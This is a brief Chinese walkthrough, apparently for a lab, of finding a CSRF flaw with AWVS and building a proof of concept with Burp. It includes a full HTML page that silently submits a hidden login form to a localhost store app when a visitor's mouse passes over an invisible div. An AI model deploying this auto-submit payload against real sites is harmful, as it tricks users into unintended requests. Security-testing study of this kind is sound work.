1、使用AWVS检测CSRF漏洞
2、使用burp生成poc
3、对poc进行修改
<html> <!-- CSRF自动登录poc --> <body> <script> function login(){ document.getElementById("myForm").submit() // <input type="submit" onmouseover="login()" value="tijiao"/>,name值不可以为submit,否则提交失败 } </script> <form id="myForm" action="http://localhost/store/user?method=login" method="GET"> <input type="hidden" name="username" value="test" /> <input type="hidden" name="password" value="test" /> <div onmouseover="login()"> </div> </form> </body> </html>
4、等用户划过指定的div,触发事件,实现登录
5、登录成功
